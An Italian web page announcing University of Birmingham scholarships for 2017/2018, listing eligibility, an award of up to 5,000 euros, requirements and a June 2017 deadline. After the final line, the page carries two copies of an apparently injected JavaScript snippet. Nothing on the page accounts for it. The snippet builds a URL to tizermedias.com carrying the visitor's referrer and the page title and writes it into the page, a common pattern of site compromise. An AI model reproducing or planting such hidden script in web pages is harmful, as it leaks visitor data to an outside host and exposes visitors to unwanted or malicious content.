Borse di studio Università di Birmingham 2017

L’Università d Birmingham in Inghilterra offre delle borse di studio rivolte a studenti particolarmente meritevoli che vogliano sfruttare l’opportunità di un’esperienza di studio in Inghilterra durante l’anno accademico 2017/2018.

A chi sono rivolte

Le borse di studio Università di Birmingham 2017 sono rivolte a studenti con un ottimo curriculum di studi e che non abbiano percepito altre borse di studio di finanziamento o di sponsorizzazione. I candidati devono essere classificati dall’Università come “contribuente oltreoceano” per il pagamento della tassa di iscrizione.

L’importo e la durata

Le borse di studio Università di Birmingham 2017 prevedono la copertura delle spese di iscrizione tramite l’Academic Merit Scholarship fino a 5.000 euro per l’anno accademico 2017/2018. I candidati dovranno essere in grado di finanziarsi il resto delle spese grazie ad altre fonti o autonomamente.

I requisiti

Per candidarsi alle borse di studio Università di Birmingham 2017 bisogna essere in possesso dei seguenti requisiti:

• ottimo curriculum studiorum;
  • non aver percepito altre borse di studio di finanziamento o di sponsorizzazione;
  • essere classificati come “contribuente oltreoceano” dall’università per il pagamento della tassa di iscrizione.

Come e quando presentare domanda

Per candidarsi alle borse di studio Università di Birmingham 2017 bisogna compilare il modulo di domanda scaricabile a questa pagina. La scadenza per l’invio delle candidature è fissata al 30 giugno 2017.

Bando borse di studio Università di Birmingham 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();